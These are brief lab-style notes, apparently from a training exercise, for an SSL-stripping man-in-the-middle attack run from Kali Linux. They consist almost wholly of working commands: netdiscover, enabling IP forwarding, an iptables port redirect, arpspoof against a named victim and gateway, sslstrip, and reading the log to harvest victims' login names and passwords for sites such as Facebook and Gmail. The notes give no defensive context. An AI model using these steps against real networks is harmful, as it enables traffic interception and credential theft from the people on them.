SSL Strip
Diagram:
On KALI Machine
* Open a Terminal
netdiscover
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i eth0 -t 10.10.1.55 -r 10.10.1.111
* Open another Terminal
sslstrip -l 8080
Once the Victim Machine access to any login website such as, Facebook, Gmail, Yahoo, we will be able to see the login name and password that store on the file sslstrip.log on Kali.
* Open another Terminal
cat sslstrip.log to see the name and password.
